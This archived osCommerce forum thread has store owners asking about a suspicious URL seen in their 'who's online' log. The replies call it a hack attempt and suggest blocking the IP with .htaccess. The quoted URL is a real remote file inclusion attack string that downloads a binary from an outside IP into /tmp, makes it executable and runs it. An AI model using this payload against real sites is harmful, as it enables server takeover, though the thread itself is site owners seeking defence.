Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Is someone trying to hack our store?


enragedcow

Recommended Posts

Occasionally, I've been checking the "who's online", and where it shows what URL on our store they are currently at, I've seen this:

 

index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|

 

It looks to me like someone is trying to get the configuration info, or something... so I checked the IP listed in that string, (http://81.174.26.111/) and sure enough, it looks like a questionable site.

 

Anyone know what any of that string in the URL means? I'm hoping we aren't getting nailed or anything....

 

Thanks!

"People tell me I have an inferiority complex. They must be right; after all, they are all smarter than me."

Link to comment
Share on other sites

Block that IP via a .htaccess file in the root of your web, as in:

 

order allow,deny

deny from 81.174.26.111

allow from all

 

And "Yes" it is a hack attempt.

 

Vger

 

Great, thanks for the info. Out of curiosity, do you know what exactly that's trying to accomplish? And is it something I should be worried about?

"People tell me I have an inferiority complex. They must be right; after all, they are all smarter than me."

Link to comment
Share on other sites

Today I noticed the same thing on my site, but with a different ip 60.36.13.35

 

Luckily I was online and check who's inline that I noticed, but what if I wasn't online how do I know somebody tried and succeeded, what do I need to check?

 

Denice

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...